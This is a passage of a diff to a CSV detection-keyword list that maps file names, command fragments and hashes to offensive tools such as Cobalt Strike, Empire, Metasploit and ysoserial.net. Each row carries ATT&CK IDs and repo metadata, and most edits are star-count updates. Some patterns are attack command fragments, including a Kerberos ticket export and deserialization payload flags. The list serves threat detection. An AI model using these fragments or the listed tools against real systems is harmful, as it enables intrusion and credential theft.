weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*exploit-suggester*","offensive_tool_keyword","Windows-Exploit-Suggester","This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins","T1199 - T1082 - T1210","TA0006 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/AonCyberLabs/Windows-Exploit-Suggester","1","1","N/A","N/A","10","3712","1016","2023-05-11T12:44:55Z","2014-07-08T13:16:28Z" "*ExploitTest.cpp*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*ExploitTest.vcxproj*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*export KRB5CCNAME=*.ccache*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" -"*export KRB5CCNAME=/*/impacket/administrator.ccache* 
","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*export KRB5CCNAME=/*/impacket/administrator.ccache* ","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Export-PowerViewCSV*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Export-PowerViewCSV*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Export-PowerViewCSV*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*exports --dll *.dll --prototypes ./Assets/prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*exposed_get_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exposed_get_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*exrienz/DirtyCow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" -"*extensions/sniffer*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*extensions/sniffer*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*external_c2.cna*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.dll*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2.Net*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*ExternalC2.Net.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*externalc2.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*externalc2.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*ExternalC2\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - 
T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*externalc2_start*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Core*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" 
@@ -10149,56 +10300,56 @@ "*ExternalC2Tests*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalC2Web*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*ExternalRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*extract_cmd_exec*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*extract_cmd_exec*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_cmd_exec*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_cmd_exec*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*extract_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*ExtractBitLockerKeys*@podalirius_*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" 
-"*ExtractBitlockerKeys.ps1*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*ExtractBitlockerKeys.py*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" -"*ExtractBitlockerKeys-main*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitLockerKeys*@podalirius_*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.ps1*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.py*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys-main*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" "*ExtractDataXML_BruteForce*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*extracttgsrepfrompcap.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*extra-scripts*timecrack.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - 
T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*eyewitness -f urls.txt --web*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*-f BinaryFormatter -g PSObject -o base64 -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"*-f Json.Net -g ObjectDataProvider -o raw -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f BinaryFormatter -g PSObject -o base64 -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f Json.Net -g ObjectDataProvider -o raw -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*-f payloads_examples/calc.*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" -"*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*f1zm0/acheron*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*f1zm0/hades*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" -"*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 